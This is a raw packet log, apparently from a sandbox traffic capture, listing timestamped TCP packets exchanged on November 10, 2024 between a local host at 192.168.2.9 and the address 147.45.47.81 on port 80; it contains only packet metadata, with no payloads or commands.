                                                                                                                                                                                Nov 10, 2024 09:18:27.127990961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128005981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128041983 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128046036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128104925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128120899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128137112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128173113 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128173113 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128261089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128320932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128336906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128351927 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128371000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128386974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128402948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128418922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128418922 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128418922 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128442049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128477097 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128751993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128798008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128806114 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128823996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128839970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128858089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.128895044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.128932953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.129092932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129110098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129125118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129141092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129158974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129173994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129189968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129203081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129208088 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.129240990 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.129240990 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.129493952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129558086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129574060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.129616976 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.183475971 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.186422110 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186456919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186470032 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186511040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186523914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186525106 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.186537027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186551094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186556101 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.186563015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186575890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186593056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.186593056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.186661005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186674118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186686039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186738014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.186738014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.186786890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186798096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186811924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.186841011 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.228375912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.228418112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.228497982 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.242472887 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242486000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242499113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242536068 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.242844105 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242854118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242863894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242871046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242877007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242891073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242924929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.242924929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.242930889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242943048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242958069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.242991924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.243004084 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.243197918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243218899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243236065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243308067 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.243396997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243408918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243421078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243448019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.243539095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.243922949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243935108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243947029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.243977070 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244046926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244059086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244070053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244081020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244098902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244112015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244122982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244137049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244142056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244142056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244149923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244163036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244175911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244189024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244194031 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244200945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244211912 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244215012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244230032 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244249105 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244272947 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244321108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244419098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244430065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244441986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244457006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244471073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244487047 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244539022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244565964 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244576931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244590044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244647026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244652987 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244659901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244687080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244721889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244721889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244903088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244913101 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244954109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.244966984 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.244996071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.245007992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.245027065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.245065928 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.245065928 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.302175045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302203894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302217007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302267075 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.302272081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302288055 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302299976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302318096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302326918 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.302331924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302364111 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.302369118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302380085 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.302381039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302393913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302434921 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.302468061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302480936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302491903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.302515030 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.302530050 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358056068 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358083963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358095884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358107090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358141899 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358159065 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358335972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358346939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358376026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358395100 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358447075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358459949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358475924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358496904 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358536005 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358570099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358582973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358596087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358608961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358629942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358664036 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358689070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358712912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358757973 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358779907 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358789921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358867884 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.358942986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358984947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.358995914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359042883 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359330893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359400988 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359430075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359441996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359453917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359494925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359500885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359507084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359565020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359566927 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359575987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359587908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359625101 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359625101 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359637022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359648943 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359690905 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359714985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359724998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359735966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359767914 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359797955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359812021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359829903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359858990 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359858990 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.359911919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359971046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.359982967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360023022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.360081911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360094070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360105038 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360124111 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360130072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.360136986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360148907 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360151052 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.360162020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360178947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360184908 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.360192060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360204935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360219955 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.360241890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360255003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360266924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.360270977 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.360313892 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.360313892 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.363018990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.363039017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.363059044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.363070965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.363082886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.363099098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.366600990 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.417639017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417701960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417715073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417721033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417772055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.417774916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417788982 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.417794943 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417808056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417819977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417850018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.417882919 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.417886972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417896986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417907953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417951107 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.417985916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.417998075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.418009043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.418021917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.418034077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.418051004 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.418051004 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.418119907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.473844051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.473856926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.473874092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.473891973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.473968029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.473968983 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.474066973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474078894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474091053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474107981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474114895 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.474122047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474133015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474176884 CET4983380192.168.2.9147.45.47.81
